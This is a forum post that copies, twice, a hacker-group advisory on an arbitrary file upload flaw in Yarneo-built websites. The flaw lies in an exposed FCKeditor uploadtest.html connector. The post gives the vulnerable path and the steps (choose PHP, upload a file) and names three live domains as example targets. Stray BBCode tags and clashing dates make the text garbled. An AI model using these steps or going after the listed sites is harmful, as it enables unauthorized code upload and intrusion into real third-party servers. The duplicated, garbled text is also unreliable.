- 22 Nis 2019
- 174
- 8
[COLOR="White# Exploit Title : ЯрНео Разработка сайтов Yarneo WebDesign Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : yarneo.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
####################################################################
# Description About Software :
*****************************
Yarneo is a Web Design and Development Company in Russia.
####################################################################
# Impact :
***********
Yarneo is prone to a vulnerability that lets attackers upload arbitrary files because
it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/fckeditor/editor/filemanager/connectors/uploadtest.html
Select the "File Uploader" to use : Choose PHP and upload your file.
Directory File Path :
**********************
/***/userfile/[YOURFILENAME].txt .jpg .gif .png
####################################################################
# Example Vulnerable Sites :
************************[/COLOR]
xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html[COLOR="Yellowxn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html[COLOR="yellowxn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html[COLOR="yellow
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : yarneo.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
####################################################################
# Description About Software :
*****************************
Yarneo is a Web Design and Development Company in Russia.
####################################################################
# Impact :
***********
Yarneo is prone to a vulnerability that lets attackers upload arbitrary files because
it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/fckeditor/editor/filemanager/connectors/uploadtest.html
Select the "File Uploader" to use : Choose PHP and upload your file.
Directory File Path :
**********************
/***/userfile/[YOURFILENAME].txt .jpg .gif .png
####################################################################
# Example Vulnerable Sites :
************************[/COLOR]
xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html[COLOR="Yellowxn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html[COLOR="yellowxn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html[COLOR="yellow